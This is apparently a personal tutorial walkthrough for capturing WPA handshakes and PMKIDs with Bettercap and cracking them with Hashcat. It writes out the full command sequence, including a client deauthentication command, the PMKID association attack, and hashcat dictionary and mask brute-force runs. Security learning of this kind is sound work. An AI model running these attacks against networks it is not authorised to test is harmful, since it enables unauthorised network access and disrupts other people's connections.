This will be a walkthrough used to obtain wireless handshakes and PMKID using Bettercap and crack it using Hashcat


This is for educational purposes and only to be performed on networks you have permission to do so.


My notes on Wireless in general can be found here.

My notes on Hashcat can be found here.

This will require having a WiFi Adapter that supports monitor mode, also known as packet injection.

I myself have and recommend these adapters:

Bettercap

Handshake

We need find our interface and put it into monitor mode.

sudo airmon-ng start (interface name)

Now we start bettercap selecting our interface

bettercap -iface (interface)

We begin scanning for networks

wifi.recon on

We can also show the WiFi Manufacturer of the AP

set wifi.show.manufacturer true

wifi.show

set wifi.recon.channel (Channel)

set net.sniff.verbose true

set net.sniff.output (SSID).pcap

set net.sniff on

events.stream on

At this point we can again, simply wait for a device to connect to the network to obtain the handshake, or we may deauthenticate the network.

wifi.deauth (BSSID)

Once we obtain the handshake, we will see the notification in our event stream

PMKID

The PMKID method is much simpler method. Just like before, we find our interface, enable monitor mode, start bettercap with that interface.

We begin scanning for networks

wifi.recon on

We can also show the WiFi Manufacturer of the AP

set wifi.show.manufacturer true

wifi.show

To start the PMKID attack we simply run

wifi.assoc (BSSID)

Once we have successfully received the RSN frame containing PMKID and it has been saved in a pcap format


Hashcracking with Hashcat

We have our PMKID in the .pcap format, we can use hashcat to crack it. First we must use the hcxpcapng tool from HCXtools.

hcxpcapng -o CrackMe (.pcapng file)

Dictionary

If we want to use a dictionary attack, like using rockyou.txt for example

hashcat -a 0 -w 3 -m 22000 (hash file) (wordlist)

Depending on your hardware, the dictionary you chose, and the password, this may take some time. You can press S for a status to see the time time estimated on finishing, as well as the updated Recovered.Total to see the recovered keys.

We can run the same command again with –show appended to the end to see our cracked passwords.

Brute Force

If we wanted to run a brute force attack rather than a dictionary attack, it’s a similar command

hashcat -a 3 -w 3 -m 22000 (hash file) '?l?l?l?l?l?l?l'

Replace the ?l with whatever we see fit.

* ?l = a-z
* ?u = A-Z
* ?d = 0-9
* ?h = 0-9a-f
* ?H = 0-9A-F
* ?s = !"#$%&'()\*+,-./:;<=>?@\[]^\_\`{|}\~
* ?a = ?l?u?d?s
* ?b = 0x00 - 0xff

This will cover the basics of the hash cracking with hashcat but it can get SO much more advanced with hashcat. Especially when using rules like OneRuleToRuleThemAllStill and modern wordlists like rockyou2021.txt.